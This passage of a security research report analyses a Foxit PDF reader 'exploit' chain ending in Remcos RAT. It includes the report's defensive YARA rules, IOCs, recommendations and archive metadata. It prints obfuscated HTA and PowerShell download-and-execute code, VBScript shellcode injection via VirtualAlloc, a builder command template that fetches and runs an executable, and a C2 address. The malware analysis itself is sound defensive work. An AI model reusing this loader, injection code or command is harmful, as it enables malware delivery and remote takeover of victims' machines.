It downloads and executes another VBScript file (sixth), which in turn downloads yet another VBScript file (seventh). The PowerShell carried inside this HTA is obfuscated with junk tokens that the chained Replace() calls turn back into the .NET names System.IO.StreamReader, System.Net.WebRequest, GetResponse, GetResponseStream and ReadToEnd, so the script reads the response body from the endpoint and hands it to Invoke-Expression (spelled 'I'+'EX'); the VBScript around it rebuilds the strings “powershell” and “winmgmts:” with StrReverse and launches the process through WMI Win32_Process.Create with a hidden window, after moving the HTA window off-screen.\r\n\u003cHTML\u003e\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\r\n\u003cHEAD\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -7000,-7000\r\nConst RWQICZXUBCOZEYOXXOLPHN = 0\r\nWQCRFZGGQLHDIRTXIFVENK = \".\"\r\nYLVTDQQXKKQGPFGEOSJZOP = \"$HEVCFLOVSDUCGFHQTKFAHKD = '[]\u003c)#]1%$-63\u003c578699)@3#y]\u003c)#]1%$-63\u003c578699)@3#t@%\\@2351$@4^^\u0026+\u00263521_43\u003c/\u00262*6_-\\!^/61[5!^\\$@.IO.]\u003c)#]1%$-63\u003c578699)@3#t6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\u003c!3\u003c/\u00262*6_-\\!^/61[5!^\\$@6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\u003c!d@%\\@2351$@4^^\u0026+\u00263521_46}}=\u0026_3+#-$^(5^\u0026/@9--+]'.Replace(']\u003c)#]1%$-63\u003c578699)@3#','S').Replace('@%\\@2351$@4^^\u0026+\u00263521_4','E').Replace('6}}=\u0026_3+#-$^(5^\u0026/@9--+','R').Replace('])=+^-6^!2=993*!\u0026^\\=\u003c!','A').Replace('3\u003c/\u00262*6_-\\!^/61[5!^\\$@','M');\r\n$HQZNQSANBGESOEVVYSOBKZQ = ($HEVCFLOVSDUCGFHQTKFAHKD -Join '')|\u0026('I'+'EX');\r\n$HSCYFSROAUPLLCWDPFTSSSZ = '[-!]#\u003c)}-[1=\u0026*=-/=)0_0}y-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)\\{4@0+!*83\\=8(_)**[\u003c3!m.N\\{4@0+!*83\\=8(_)**[\u003c3!-$)047)[({2\\$40(!5$9{).W\\{4@0+!*83\\=8(_)**[\u003c3!bR\\{4@0+!*83\\=8(_)**[\u003c3!qu\\{4@0+!*83\\=8(_)**[\u003c3!-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)]'.Replace('-!]#\u003c)}-[1=\u0026*=-/=)0_0}','S').Replace('\\{4@0+!*83\\=8(_)**[\u003c3!','E').Replace('-$)047)[({2\\$40(!5$9{)','T');\r\n$HVILEIYVLFQVNERXEWCGCXO = ($HSCYFSROAUPLLCWDPFTSSSZ -Join '')|\u0026('I'+'EX');$HVSQXGOSZZWOBNBTGXRCCZL = '\u0026@_-)*0%\u00263@]3*9/-3]7!5r0(#9@{/8_\u003c86!95505!/82a#!#!%26@*34@32@!6\u0026\u00260##0(#9@{/8_\u003c86!95505!/82'.Replace('\u0026@_-)*0%\u00263@]3*9/-3]7!5\r\n;$HJCNHHHRXRCBHPAEKDHSXUX = '_]81{)-=]#\\872]20\\39$53\u003c73-//{#/_1+\u00264%8*(}7+tR3\u003c73-//{#/_1+\u00264%8*(}7+%}[0%58)75/^{8}=[}-41\u003cpon%}[0%58)75/^{8}=[}-41\u003c3\u003c73-//{#/_1+\u00264%8*(}7+'.Replace('_]81{)-=]#\\872]20\\39$5','G').Replace('3\u003c73-//{#/_1+\u00264%8*(}7+','E').Replace('%}[0%58)75/^{8}=[}-41\u003c','S');\r\n$HDRRVVKQKQNGJTRCWXTFBBJ = 'G36=[_^+{34+%8+\\48#/+$!t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+{34+%8+\\48#/+$!(6@!\\}_\u0026+(/#^@7%%}*{=^pon(6@!\\}_\u0026+(/#^@7%%}*{=^36=[_^+{34+%8+\\48#/+$!(6@!\\}_\u0026+(/#^@7%%}*{=^t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+{34+%8+\\48#/+$!am'.Replace('(6@!\\}_\u0026+(/#^@7%%}*{=^','S').Replace('36=[_^+{34+%8+\\48#/+$!','E').Replace('\u0026#-$^#!/\u002679346)265}]\u0026[','R');\r\n$HQLHKKPKITBTDYXPDFDXDCN = '=14\u0026\u0026!*6}12=_047\u003c0$4*%75(-^77{]*}_+=!\u003c[\u003c@@#8a1#\u00260\\/6^%#08}/\\-[@/15^To75(-^77{]*}_+=!\u003c[\u003c@@#8n1#\u00260\\/6^%#08}/\\-[@/15^'.Replace('=14\u0026\u0026!*6}12=_047\u003c0$4*%','R').Replace('75(-^77{]*}_+=!\u003c[\u003c@@#8','E').Replace('1#\u00260\\/6^%#08}/\\-[@/15^','D');\r\n\u0026('I'+'EX')($HQZNQSANBGESOEVVYSOBKZQ::new($HVILEIYVLFQVNERXEWCGCXO::$HVSQXGOSZZWOBNBTGXRCCZL('hxxps://www.digitalmark\r\nDUHJKVWUERPRNNKARQDOXB = StrReverse(\" \"+\"l\"+\"l\"+\"e\"+\"h\"+\"s\"+\"r\"+\"e\"+\"w\"+\"o\"+\"p\")\r\nSet ITTTPGKCLFFSQRFUUWYUSV = GetObject(StrReverse(\":\"+\"s\"+\"t\"+\"m\"+\"g\"+\"m\"+\"n\"+\"i\"+\"w\") _\r\n \u0026 StrReverse(\"\\\"+\"\\\"+\"!\"+\"}\"+\"e\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\"+\"m\"+\"i\"+\"=\"+\"l\"+\"e\"+\"v\"+\"e\"+\"L\"+\"n\"+\"o\"+\"i\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p{\") _\r\n \u0026 WQCRFZGGQLHDIRTXIFVENK \u0026 StrReverse(\"2\"+\"v\"+\"m\"+\"i\"+\"c\"+\"\\\"+\"t\"+\"o\"+\"o\"+\"r\"+\"\\\"))\r\nSet RPFCRWSNXWFCEAQKDKOGWP = ITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"p\"+\"u\"+\"t\"+\"r\"+\"a\"+\"t\"+\"S\"+\"s\"+\"se\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nSet NDGKJWLKGWSPQZGHKLTLZG = RPFCRWSNXWFCEAQKDKOGWP.SpawnInstance_\r\nNDGKJWLKGWSPQZGHKLTLZG.ShowWindow = RWQICZXUBCOZEYOXXOLPHN\r\n' Create Notepad process\r\nSet WTQVYZLZBRCALBUSHDHPJG = ITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"s\"+\"s\"+\"e\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nRASUVEQBLDGPFLLFXDQZRH = WTQVYZLZBRCALBUSHDHPJG.Create _\r\n (DUHJKVWUERPRNNKARQDOXB+YLVTDQQXKKQGPFGEOSJZOP, Null, NDGKJWLKGWSPQZGHKLTLZG, intProcessID)\r\nself.close\r\n\u003c/script\u003e\r\n\u003cbody\u003e\r\nHBar\r\n\u003c/body\u003e\r\n\u003c/HEAD\u003e\r\n\u003c/HTML\u003e\r\nCode 22 – 5th Payload code.\r\nAt this stage, the attack chain had used two PDF files, each employing a distinct method of “exploitation”, and had involved seven downloads and executions of scripting-language files. The seventh payload (VBS) contains embedded Base64 strings:\r\n1. DynamicWrapperX Loader, dynwrapx.dll (stored as AUTOUPDATESTART.dll)\r\n2. Shellcode, to be injected into the Loader\r\nDCOM_NAME = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (str_temp) \u0026 \"\\\" \u0026 str_autoupdatestart \u0026 \".BIN\"\r\nIF NOT IS_DOTNET THEN\r\n str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\" \u0026 \"\\\" \u0026 str_rundll32)\r\nELSE\r\n str_rundll32 = SHELLOBJ.EXPANDENVIRONMENTSTRINGS (\"%WINDIR%\")\u0026\"\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSBUILD.EXE\"\r\nEND IF\r\nWRITE_FILE DCOM_NAME,TEXTTOBINARY(str_base64_1, \"BIN.BASE64\")\r\nDO\r\n' CHR(7.5+7.6+7.4+8.5+1.5+1.5) evaluates to CHR(34), a double quote, so the dropped path is quoted\r\nSHELLOBJ.RUN \"REGSVR32.EXE /I /S \"\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5)\u0026DCOM_NAME\u0026 CHR(7.5+7.6+7.4+8.5+1.5+1.5),0,TRUE\r\nSET DCOM = CREATEOBJECT(\"DYNAMICWRAPPERX\")\r\nCode 23 – Creation of DynamicWrapperX.\r\n' DynamicWrapperX signature: four input arguments (pointer, uint, uint, uint), pointer return\r\nDCOM.REGISTER \"KERNEL32.DLL\", \"VirtualAlloc\",LCASE(\"I=PUUU\"), LCASE(\"R=P\")\r\n....\r\n' 4096 = MEM_COMMIT, 64 = PAGE_EXECUTE_READWRITE; one byte per hex pair of str_base64_2\r\nLOADER_PTR = DCOM.VIRTUALALLOC (0,LEN(str_base64_2)/2,4096,64)\r\nFOR I = 1 TO LEN (str_base64_2) STEP 2\r\nCHAR = ASC(CHR(\"\u0026H\"\u0026MID (str_base64_2,I,2)))\r\nDCOM.NUMPUT EVAL(CHAR),LOADER_PTR,(I-1)/2\r\nCode 24 – Allocation and Injection of Shellcode.\r\nOnce the injection process is completed, it proceeds to load and execute the Shellcode, which subsequently decrypts the malicious executable. The infection ultimately manifests as Remcos RAT with the command and control server located at 139.99.85[.]106:2404, operating under the botnet name “Telegram : @Silentkillertv”. Another instance of Remcos, identified by the hash 2266f701f749d4f393b8a123bd7208ec7d5b18bbd22eb47853b906686327ad59, also utilizes the same command and control server. 
However, in this case, the botnet name was “RemoteHost”.\r\nCheck Point managed to uncover various “online fingerprints”, ranging from YouTube and TikTok accounts to Telegram accounts and channels established by the actor. These platforms were used to disseminate malicious tools and resources.\r\nFigure 21 – @Silentkillertv YouTube Channel.\r\nFigure 22 – Telegram Account \u0026 Channel.\r\nTelegram Message from the Threat Actor:\r\nName: The Silent Killer\r\nConnected to the Internet and the world of piracy since 2003\r\nI don't have another name online and I never remember I cheated on anyone because this goes against my religion, and that's so bad, that's why I'm honest with people and there's nothing that scares me.\r\nA fraudster usually has many names and accounts assigned to fraud. I don’t have any other channel or name\r\nYou don’t have to buy and use my tools, but don’t accuse anyone of being a scam because you don’t have the money to buy and use the tools.\r\nAdvice for beggars Instead of looking for free tools and begging, go learn to program and develop yourself and don’t waste your time on empty things.\r\nGreetings to everyone\r\n@Silentkillertv\r\nBuilders\r\nAfter understanding the exploit and identifying its key components, we hunted for additional malicious samples. Among the collected files, we found several .NET and Python files that triggered our detection rule; on closer examination, these turned out to be the builders responsible for generating the malicious samples. Regardless of the programming language, all builders exhibit a consistent structure. 
The PDF template utilized for the exploit includes placeholder text, which is substituted once the user supplies the URL from which the malicious file is to be downloaded.\r\nPython Builders\r\nCheck Point obtained two Python builders, which were developed by the same author, as they feature identical Python code. The only variation lies in the PowerShell command embedded in the PDF exploit template.\r\nFigure 23 – Python Builder Source Code.\r\nThe command employed in this builder initially utilizes CMD, which then triggers PowerShell.\r\nFigure 24 – Builder’s Command.\r\nIn the other Python builder, instead of dropping the payload as a .vbs file, it is dropped as a .exe file.\r\nOnce the actor has successfully built the PDF exploit, the final message is written in Portuguese: “Payload generated successfully.”\r\n.NET Builders\r\nFor .NET, we obtained multiple builders: “Avict Softwares I Exploit PDF”, “PDF Exploit Builder 2023”, and “FuckCrypt”. All three builders have similar code, and we wouldn’t be surprised if actors stole each other’s code and made their own builders.\r\nFigure 25 – “Avict Softwares I Exploit PDF” Builder.\r\nFigure 26 – “Avict Softwares” interface.\r\nFigure 27 – “PDF Exploit Builder 2023” Template is stored as a Resource.\r\nFigure 28 – “FuckCrypt” interface.\r\n“FuckCrypt” comprises two functionalities: one is “Exe to VBS”, and the other is the PDF exploit.\r\nAll the builders have the “same” commands and flow. The only thing different between them is the filenames. 
Below is their generic command, with $STRING placeholders marking the parts that differ between them.\r\n/F (CMD) /P (/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('$URL', '$DROPPED_FILENAME.exe')\" \u003e\u003e $BAT_FILENAME.bat \u0026@echo timeout /t 5 \u003e\u003e $BAT_FILENAME.bat \u0026@echo start $DROPPED_FILENAME.exe \u003e\u003e $BAT_FILENAME.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e $VBS_FILENAME.vbs \u0026@echo Dim strArgs \u003e\u003e $VBS_FILENAME.vbs \u0026@echo strArgs = \"cmd /c $BAT_FILENAME.bat\" \u003e\u003e $VBS_FILENAME.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e $VBS_FILENAME.vbs \u0026 $VBS_FILENAME.vbs \u0026dEl $VBS_FILENAME.vbs\r\nCode 25 – Generic Command.\r\nThe Python builders share similar names with the “PDF Exploit Builder” (supporting only EXE), implying either that they were developed by the same individual or that one of the builders was “copied” and ported to another language. A scenario where the code was stolen from .NET and rewritten in Python seems more plausible. 
The similarity in names between “Avict Software” (which supports only EXE) and “FuckCrypt” (VBS) points to a similar situation of potential code stealing between developers, or to the same author, as in the previous scenario.\r\nBuilders Statistics\r\nFrom the filenames observed in the commands, it appears that the most frequently used builders are the “PDF Exploit Builder” and the Python variants. It is also possible that commands were added manually or that additional builders exist beyond those obtained.\r\nFigure 29 – Most Used Builders based on PDF Commands analysis.\r\nFigure 30 – PDF Commands Executed Analysis.\r\nApart from the observed builders, we also discovered a GitHub project created on February 13 that provides another .NET builder with exactly the same “exploit” commands as those mentioned above. This same builder is used by the APT group APT-C-35 / DoNot Team.\r\nFigure 31 – GitHub Builder\r\nConclusion\r\nWhile this “exploit” doesn’t fit the classical definition of triggering malicious activities, it is more accurately categorized as a form of “phishing” or manipulation aimed at Foxit PDF Reader users, coaxing them into habitually clicking “OK” without understanding the potential risks involved. The threat actors range from e-crime to APT groups, and the underground ecosystem has taken advantage of this “exploit” for years: it has been “rolling undetected” because most AV and sandbox solutions rely on the major player among PDF readers, Adobe, which is not susceptible to it. The infection success and the low detection rate allow PDFs to be distributed via many untraditional ways, such as Facebook, without being stopped by any detection rules. 
Check Point reported the issue to Foxit Reader, which acknowledged it and stated that it would be resolved in version 2024 3.\r\nRecommendations\r\nUntil the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to classic defense practices. To mitigate the risks of being affected by such threats, it is essential to:\r\n1. Keep operating systems and applications updated through timely patches and other means.\r\n2. Be cautious of unexpected emails with links, especially from unknown senders.\r\n3. Enhance cybersecurity awareness among employees.\r\n4. Consult security specialists for any doubts or uncertainties.\r\nProtection\r\nCheck Point Threat Emulation, Harmony Endpoint, and Harmony Mobile Protect provide comprehensive coverage of attack tactics, file types, and operating systems, and protect customers against the type of attacks and the “exploit” described in this report.\r\nExploit.Wins.FoxitExploit.ta.A\r\nYara Rules\r\nrule exploit_foxit_pdf\r\n{\r\n meta:\r\n author = \"Antonis Terefos(@Tera0017) @ Check Point Research\"\r\n description = \"PDF FOXITReader\"\r\n strings:\r\n $pdf_header = \"%PDF-\"\r\n $pdf_string1 = \"/OpenAction\"\r\n $pdf_string2 = \"/Launch\"\r\n $pdf_string3 = \"/Win\"\r\n $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n $command_string1 = \"(CMD)\" nocase\r\n $command_string2 = \"powershell\" nocase\r\n $command_string3 = \"cmd.exe\" nocase\r\n $command_string4 = \"Wscript.Shell\" nocase\r\n $command_string5 = \"DownloadFile(\" nocase\r\n $command_string6 = \" curl \" nocase\r\n $command_string7 = \" bitsadmin \" nocase\r\n condition:\r\n $pdf_header in (0..1024) and all of ($pdf_string*) and any of ($command_string*)\r\n}\r\nrule exploit_foxit_pdf_builders\r\n{\r\n meta:\r\n author = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"PDF Foxit Reader samples related to builders\"\r\n strings:\r\n $pdf_header = \"%PDF-\"\r\n $builder_string1 = \"startxref\\r\\n1866%%EOF\"\r\n $builder_string2 = \"ID [ (bc38735adadf7620b13216ff40de2b26) (bc38735adadf7620b13216ff40de2b26) ]\"\r\n $pdf_string1 = \"/OpenAction\"\r\n $pdf_string2 = 
\"/Launch\"\r\n $pdf_string3 = \"/Win\"\r\n $pdf_string4 = /\\/Launch[ \\n\\r]*(\\/[a-zA-Z]+[ \\n\\r]*)*\\/Win/\r\n $command_string1 = \"(CMD)\" nocase\r\n $command_string2 = \"powershell\" nocase\r\n $command_string3 = \"cmd.exe\" nocase\r\n $command_string4 = \"Wscript.Shell\" nocase\r\n $command_string5 = \"DownloadFile(\" nocase\r\n $command_string6 = \" curl \" nocase\r\n $file_string1 = \".exe\"\r\n $file_string2 = \".vbs\"\r\n $file_string3 = \".bat\"\r\n $file_string4 = \".com\"\r\n condition:\r\n $pdf_header in (0..1024) and any of ($builder_string*) and all of ($pdf_string*) and any of ($command_stri\r\n}\r\nrule donot_downloader\r\n{\r\n meta:\r\n author = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"APT-C-35 / DoNot Team Downloader\"\r\n strings:\r\n $code1 = {83 C0 1A 99 B9 1A 00 00 00 F7 F9 8B C2 83 C0 (41| 61)}\r\n $string1 = \"\\\\TestLog\\\\\" ascii fullword\r\n $string2 = \"\\\\Intel\\\\\" ascii fullword\r\n $string3 = \"Computer Name: \" ascii fullword\r\n $string4 = \"IP Address: \" ascii fullword\r\n $string5 = \"User Name: \" ascii fullword\r\n $string6 = \"Operating System Version: \" ascii fullword\r\n $string7 = \"Computer information written to computer_info.txt\" ascii fullword\r\n $stirng8 = \"filetoupload\" ascii fullword\r\n condition:\r\n uint16(0) == 0x5A4D and 6 of them or ($code1 and 4 of ($string*))\r\n}\r\nrule donot_uploader\r\n{\r\n meta:\r\n author = \"Antonis Terefos (@Tera0017) @ Check Point Research\"\r\n description = \"APT-C-35 / DoNot Team Uploader\"\r\n strings:\r\n $code1 = {B8 4F EC C4 4E 41 F7 E8 C1 FA 03 8B C2 C1 E8 1F 03 D0 6B C2 1A 44 2B C0 41 80 C0}\r\n $string1 = \"filetoupload\" ascii fullword\r\n $string2 = \"Path not found: [%s]\\n\" wide fullword\r\n $string3 = \"Directory: %s\\n\" wide fullword\r\n $string4 = \"File: %s\\n\" wide fullword\r\n condition:\r\n uint16(0) == 0x5A4D and 4 of them\r\n}\r\nIOCs\r\nBuilders:\r\n(Avict Software) 
3f291d07a7b0596dcdf6f419e6b38645b77b551a2716649c12b8706d31228d79\r\n(Avict Software) f002712b557a93da23bbf4207e5bc57cc5e4e6e841653ffab59deb97b19f214e\r\n(PDF Exploit Builder) ac7598e2b4dd12ac584a288f528a94c484570582c9877c821c47789447b780ec\r\n(FuckCrypt) 20549f237f3552570692e6e2bb31c4d2ddf8133c5f59f5914522e88239370514\r\n(FuckCrypt) 87effdf835590f85db589768b14adae2f76b59b2f33fae0300aef50575e6340d\r\n(FuckCrypt) 5c42a4b474d7433bd9f1665dc914de7b3cc7fbdb9618b0322324b534440737d7\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 31 of 32\n\n(Python) 79e1cb66cb52852ca3f46a2089115e11fff760227ae0ac13f128dda067675fbc\r\n(Python) a4a8486c26c050ed3b3eb02c826b1b67e505ada0bf864a223287d5b3f7a0cde0\r\nMalicious Files:\r\n(PDF) d44f161b75cba92d61759ef535596912e1ea8b6a5a2067a2832f953808ca8609\r\n(PDF) 9c5883cf118f1d22795f7b5661573f8099554c5a3f78d592e8917917baa6d20f\r\n(PDF) 2aa9459160149ecefd1c9b63420eedc7fe3a21ae0ca3e080c93fd39fef32e9c0\r\n(PDF) 8155a6423d64f30d2994163425d3fbe14a52927d3616ffacea36ddc71a6af4b0\r\n(PDF) c1436f65acbf7123d1a45b0898be69ba964f0c6d569aa350c9d8a5f187b3c0e7\r\n(PDF) de8ecd738f1f24a94aba06f19d426399bc250cc5e7b848b2cbd92fc1d6906403\r\n(Blank-Grabber) d2bd6a05d1e30586216e73602a05367380ae66654cd0bccabb0414ef6810ab18\r\n(Python-Stealer-Dropper) e32d2966a22243f346e06d4da5164abab63c2700c905f22c09a18125ee4de559\r\n(BAT file) eb87ec49879dc44b6794bb70bd6c706e74694e4c2bbc1926dd4cff42e5b63cc6\r\n(BAT file) b59ab9147214bc1682006918692febed4ad37e1d305c5c80dc1ee461914eacd2\r\n(APT-C-35 / DoNot Team Downloader)\r\n4ef9133773d596d1c888b0ffe36287a810042172b0af0dfad8c2b0c9875d1c65\r\n(APT-C-35 / DoNot Team Downloaded1)\r\n3e9a60d5f6174bb1f1c973e9466f3e70c74c771043ee00688e50cac5e8efe185\r\n(APT-C-35 / DoNot Team Uploader)\r\n2d40e892e059850ba708f8092523efeede759ecd6e52d8cb7752462fcdb6f715\r\n(APT-C-35 / DoNot Team Screen)\r\nc943fe1b8e1b17ec379d33a6e5819a5736cb5de13564f86f1d3fba320ccebaa0\r\n(APT-C-35 / DoNot Team APK) 
7f5f1586b243f477c484c34fa6243c20b3ecf29700c6c17e23a4daf9360e2d2f\r\n(APT-C-35 / DoNot Team APK) ecb4f5f0ee0cda289056f2f994c061d53cfbc8ac413f2ca4da8864c68f0a23f6\r\n(APT-C-35 / DoNot Team APK) 4a7aeb6f510cf5d038e566a3ccd45e98a46463bb67eb34012c8e64444464b081\r\n(PDF) D5483049DC32D1A57E759839930FE17FE31A5F513D24074710F98EC186F06777\r\n(PDF) 19A8201C6A3063B897D696330C1B60BD97914514D2AE6A6C3C1796BEC236724A\r\n(VBScript) 9A7F4FF5FD0A972EEDA9293727F0EECDD7CE2CFE0A072CDF9D3402EE9C46A48E\r\n(VBScript) D761FE4D58FE68FC95D72871429F0FCE6055389A58F81CF0A19EB905A96E1C38\r\n(VBScript) B3AD75EEF9208D58A904030D44DA22C59CE7BD47ED798B0A14B58330A1390FE8\r\n(VBScript) FC330BB132A345AF05FEB0D275EEEF29C7A439A04223757F33360393CF975CA9\r\n(VBScript) A334A9C1A658F4EBEF7BA336F9A27693030DC444509BD9FA8FDEFE8AAAE3A133\r\n(VBScript) E9BF261A779C1B3A023189BEF509579BAD8B496DCFE5E96C19CF8CC8BEA48A08\r\n(VBScript) EE42CF45FFF12BCC9E9262955470BFED810F3530E651FDDB054456264635D9D2\r\n(VBScript) 1CBF897CCCC22A1E6D6A12766ADF0DCEE4C103539ADD2C10C7906042E19519F4\r\n(DynamicWrapperX)\r\n4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379\r\n(ShellCode) A5C9A3518F072982404E68DC6A3DC90EDEBBF292FC1ACA6962B6CCF64F4FE28C\r\n(Remcos) 0ADE87BA165A269FD4C03177226A148904E14BD328BDBB31799D2EAD59D7C2FA\r\nSource: https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 32 of 32\n\nThe file was uploaded Figure 19 on the 27th of April by “ - Bechtelar Libby @bechtelarlibby ”.\nFigure 19- PDF attached on 27th of April 2024\n  Page 18 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/"
	],
	"report_names": [
		"foxit-pdf-flawed-design-exploitation"
	],
	"threat_actors": [
		{
			"id": "2ac63ef4-a7b8-4a30-96ad-b30ccb2073fc",
			"created_at": "2022-10-25T16:07:23.546262Z",
			"updated_at": "2026-04-10T02:00:04.651083Z",
			"deleted_at": null,
			"main_name": "Donot Team",
			"aliases": [
				"APT-C-35",
				"Mint Tempest",
				"Origami Elephant",
				"SectorE02"
			],
			"source_name": "ETDA:Donot Team",
			"tools": [
				"BackConfig",
				"EHDevel",
				"Jaca",
				"yty"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cfdd350b-de30-4d29-bbee-28159f26c8c2",
			"created_at": "2023-01-06T13:46:38.433736Z",
			"updated_at": "2026-04-10T02:00:02.972971Z",
			"deleted_at": null,
			"main_name": "VICEROY TIGER",
			"aliases": [
				"OPERATION HANGOVER",
				"Donot Team",
				"APT-C-35",
				"SectorE02",
				"Orange Kala"
			],
			"source_name": "MISPGALAXY:VICEROY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434179,
	"ts_updated_at": 1775791983,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.pdf",
		"text": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.txt",
		"img": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.jpg"
	}
}